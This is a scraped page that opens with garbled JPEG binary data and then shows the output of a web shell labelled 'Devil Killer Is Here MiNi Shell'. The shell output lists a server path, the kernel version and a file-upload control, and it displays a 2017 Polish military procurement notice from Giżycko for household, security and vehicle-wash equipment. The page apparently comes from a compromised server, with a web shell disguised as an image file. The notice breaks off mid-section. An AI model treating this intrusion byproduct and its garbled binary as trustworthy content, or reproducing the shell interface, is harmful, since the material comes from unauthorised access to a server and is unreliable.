JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170307/38383-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.24wog.wp.mil.pl, www.bip.mon.gov.pl' target='_blank'>http://www.24wog.wp.mil.pl, www.bip.mon.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 38383 - 2017
              z dnia 2017-03-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Giżycko: DOSTAWA SPRZĘTU GOSPODARCZEGO, SPRZĘTU DO ZABEZPIECZENIA OBIEKTÓW I INFORMACJI ORAZ CZĘŚCI ZAMIENNYCH DO MYJNI POJAZDÓW<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>24 Wojskowy Oddział Gospodarczy, krajowy numer identyfikacyjny
              28060211800000, ul.
              ul. Nowowiejska 
              20,
              11500  
              Giżycko, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              261 335 922, e-mail
              24wog.zam@wp.mil.pl, faks
              261 335 641.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Oddział Gospodarczy RON</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.24wog.wp.mil.pl, www.bip.mon.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Za pomocą operatora pocztowego, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />24 Wojskowy Oddział Gospodarzy ul. Nowowiejska 20, 11-500 Giżycko, budynek nr 5, pokój 101</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOSTAWA SPRZĘTU GOSPODARCZEGO, SPRZĘTU DO ZABEZPIECZENIA OBIEKTÓW I INFORMACJI ORAZ CZĘŚCI ZAMIENNYCH DO MYJNI POJAZDÓW<br /><b>Numer referencyjny: </b>13/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest dostawa drobnego sprzętu gospodarczego, sprzętu gospodarczego, sprzętu do zabezpieczenia obiektów i informacji, części zamiennych do myjni pojazdów dla 24 Wojskowego Oddziału Gospodarczego, wg. opisu przedmiotu zamówienia stanowiącego załączniki nr 1, 2, 3 i 4 do siwz o wartości szacunkowej poniżej kwot określonych w przepisach wydanych na podstawie 
art. 11 ust. 8 ustawy Pzp, oraz wg. Ilości podanych w ust. 3 oraz załącznikach nr 7, 8, 9 i 10 do siwz.

2.	Szczegółowy opis przedmiotu dla wszystkich zadań zawierają załączniki nr 1 - 4 do siwz  Opis przedmiotu zamówienia

<br /><br /><b>II.5) Główny kod CPV: </b>39200000-4<br /><b> Dodatkowe kody CPV:</b>19500000-1,
                34900000-6,
                44100000-1,
                44500000-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 21<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Okres realizacji zamówienia uzależniony będzie od treści złożonej oferty i może wynosić odpowiednio od 14 do 21 dni od dnia podpisania umowy.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa szczególnych wymagań w zakresie posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, przyjmując jako dokument potwierdzający spełnianie tego warunku podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (załącznik nr 6 do SIWZ)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa szczególnych wymagań w zakresie sytuacji ekonomicznej lub finansowej wykonawcy, przyjmując jako dokument potwierdzający spełnianie tego warunku podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (załącznik nr 6 do SIWZ)<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określa szczególnych wymagań w zakresie posiadania zdolności technicznej lub zawodowej wykonawcy, przyjmując jako dokument potwierdzający spełnianie tego warunku podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (załącznik nr 6 do SIWZ)<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. a. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 3 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości b. Dokument, o którym mowa w pkt. a, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz ofertowy podpisany na każdej stronie (załącznik nr 5 do siwz)
Zestawienie cenowe przedmiotu zamówienia (załączniki nr 7, 8, 9 i/lub 10 do siwz)
Jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia 
z udziału w postępowaniu, zamieszcza informacje 
o podwykonawcach w oświadczeniu, o którym mowa 
w pkt 2 niniejszej tabeli.
DOWÓD WNIESIENIA WADIUM  kserokopia dowodu potwierdzona za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy (dotyczy zadań nr 1 i 3)
Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda wniesienia wadium w zakresie zadań nr 1 i 3.
2.	Zamawiający żąda na poszczególne zadania wadium w kwotach:
a.	dla zadania nr 1  6 500,00 zł,
b.	dla zadania nr 2  bez wadium,
c.	dla zadania nr 3  3 000,00 zł,
d.	dla zadania nr 4  bez wadium.
3.	Zamawiający żąda wniesienia wadium w pełnej wysokości przed terminem 
do składania ofert.
4.	Wadium może być wniesione w:
a.	pieniądzu;
b.	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240 ze zm.).
5.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku: NBP O/O Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem w tytule przelewu: Wadium w post. nr 13/2017  Dostawa sprzętu gospodarczego, sprzętu do zabezpieczenia obiektów i informacji oraz części zamiennych do myjni pojazdów.
6.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt 3, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
7.	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
a.	pieniężnej  dokument potwierdzający dokonanie przelewu wadium został załączony do oferty;
b.	innej niż pieniądz  oryginał dokumentu został złożony w oddzielnej kopercie, 
a jego kopia w ofercie
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
